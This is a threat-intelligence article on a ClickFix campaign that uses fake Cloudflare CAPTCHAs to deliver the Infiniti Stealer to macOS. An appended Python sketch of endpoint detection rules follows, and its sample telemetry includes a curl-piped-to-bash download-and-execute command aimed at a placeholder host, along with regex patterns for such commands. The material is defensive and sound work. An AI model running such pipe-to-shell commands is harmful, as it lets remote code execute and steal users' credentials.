Cybercriminals have engineered a scheme that mimics legitimate Cloudflare pages to carry out what is known as a ClickFix attack, targeting macOS systems. Upon visiting a compromised site, users encounter a convincing fake CAPTCHA page designed to trick them into executing malicious commands without realizing it. This social engineering technique has become increasingly common among threat actors looking to bypass traditional security controls, as it relies on human interaction rather than software exploits alone.
A Bash Script Quietly Takes Over the System
Once the user interacts with the fake CAPTCHA prompt, the attack moves into its next stage by deploying a Bash script that runs silently in the background. This script is responsible for downloading and setting up the additional components required to complete the infection chain. Because it operates beneath the surface of normal user activity, it is particularly difficult to detect without dedicated endpoint monitoring tools in place.
The Nuitka Loader Obscures the Malicious Payload
To further evade detection, the threat actors behind this campaign use Nuitka, a Python-to-machine-code compiler, as a loader for the next phase of the attack. By compiling Python code directly into machine code, Nuitka-based loaders are far more difficult for traditional antivirus and security tools to flag compared to standard Python scripts. This layered obfuscation approach is a deliberate effort to extend the window of time the malware can operate undetected on a compromised machine.
Infiniti Stealer Harvests Sensitive Data From macOS Devices
The final payload delivered through this infection chain is a Python-based infostealer known as Infiniti Stealer. Once deployed on a victim’s macOS device, it begins harvesting sensitive information including credentials and system data, which can then be used for unauthorized access, identity theft, or further downstream attacks. The combination of a fake Cloudflare CAPTCHA, a Bash script, a Nuitka loader, and the Python-based infostealer makes this a well-structured, multi-stage threat that is harder to disrupt at any single point.
How Organizations Can Defend Against ClickFix-Style Threats
To reduce exposure to attacks like this one, organizations should deploy advanced endpoint detection and response tools capable of identifying unusual script execution and outbound data transfers on macOS devices. Regular security awareness training is also critical, particularly around social engineering tactics like fake CAPTCHA pages. Routine security assessments and keeping software up to date remain foundational steps in reducing the attack surface available to threat actors running campaigns of this nature.
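As an added example that is not part of the original article, the Python below sketches the kind of detection logic an endpoint tool would run for the behaviours this campaign chains together: a shell launched from an interactive parent (the user pasting a command copied from a web page) with a download-and-execute command line, and outbound connections from the process tree that shell creates. The telemetry records, their field names, the rule names and all sample values are constructed for this example and do not follow any vendor's schema.

```python
"""Detect ClickFix-style script execution and follow-on network activity on macOS.

The events below are constructed for this example; the field names imitate a
generic EDR process/network telemetry schema and are an assumption, not any
vendor's format.
"""
import re
from dataclasses import dataclass

SHELLS = {"bash", "sh", "zsh"}
# Processes a user is in when pasting a command copied from a web page.
INTERACTIVE_PARENTS = {"Terminal", "iTerm2", "osascript"}

# Command-line shapes that indicate download-and-execute behaviour.
RULES = {
    "download_pipe_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(bash|sh|zsh)\b"),
    "decode_pipe_shell": re.compile(r"\bbase64\b[^|]*\|\s*(bash|sh|zsh)\b"),
    "chmod_then_exec": re.compile(r"\bchmod\s+\+x\b.*&&\s*\./"),
}


@dataclass(frozen=True)
class Finding:
    pid: int
    rule: str
    detail: str


def check_process(ev: dict) -> list[Finding]:
    """Flag a shell whose command line matches a download-and-execute rule."""
    findings: list[Finding] = []
    if ev.get("image") not in SHELLS:
        return findings
    cmd = ev.get("cmdline", "")
    for name, pat in RULES.items():
        if pat.search(cmd):
            findings.append(Finding(ev["pid"], name, cmd))
    # A matching shell spawned from Terminal/osascript is the ClickFix signature:
    # the user pasted the command rather than an application launching it.
    if findings and ev.get("parent_image") in INTERACTIVE_PARENTS:
        findings.append(Finding(ev["pid"], "user_pasted_command",
                                f"parent={ev['parent_image']}"))
    return findings


def correlate(events: list[dict]) -> list[Finding]:
    """Run process rules, then flag outbound connections from flagged process trees."""
    findings: list[Finding] = []
    flagged: set[int] = set()  # pids of processes that tripped a rule, plus their children
    for ev in events:
        if ev["type"] == "process":
            hits = check_process(ev)
            if hits or ev.get("ppid") in flagged:
                flagged.add(ev["pid"])  # children of a flagged shell inherit suspicion
            findings.extend(hits)
        elif ev["type"] == "network" and ev["pid"] in flagged:
            findings.append(Finding(ev["pid"], "outbound_from_flagged_tree",
                                    f"{ev['image']} -> {ev['dest']}:{ev['port']}"))
    return findings


# Constructed telemetry: a paste into Terminal, a curl|bash stage, a child
# python process, an outbound connection from that child, and a benign control.
SAMPLE_EVENTS = [
    {"type": "process", "pid": 501, "ppid": 1, "image": "Terminal",
     "parent_image": "launchd", "cmdline": "Terminal"},
    {"type": "process", "pid": 502, "ppid": 501, "image": "bash", "parent_image": "Terminal",
     "cmdline": "bash -c 'curl -fsSL https://example.invalid/verify.sh | bash'"},
    {"type": "process", "pid": 503, "ppid": 502, "image": "python3", "parent_image": "bash",
     "cmdline": "python3 /tmp/stage2"},
    {"type": "network", "pid": 503, "image": "python3", "dest": "203.0.113.10", "port": 443},
    # Benign control: an admin-run package update from Terminal with no pipe-to-shell.
    {"type": "process", "pid": 600, "ppid": 501, "image": "zsh", "parent_image": "Terminal",
     "cmdline": "zsh -c 'brew update'"},
    {"type": "network", "pid": 600, "image": "zsh", "dest": "198.51.100.7", "port": 443},
]


if __name__ == "__main__":
    for f in correlate(SAMPLE_EVENTS):
        print(f"pid={f.pid} rule={f.rule} {f.detail}")
```

The design point is the correlation step: a command-line regex alone catches the first stage, but tying later network events to the lineage of a flagged shell is what surfaces the loader and stealer stages even when their own command lines look innocuous, while the benign Terminal session with no pipe-to-shell produces no finding.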
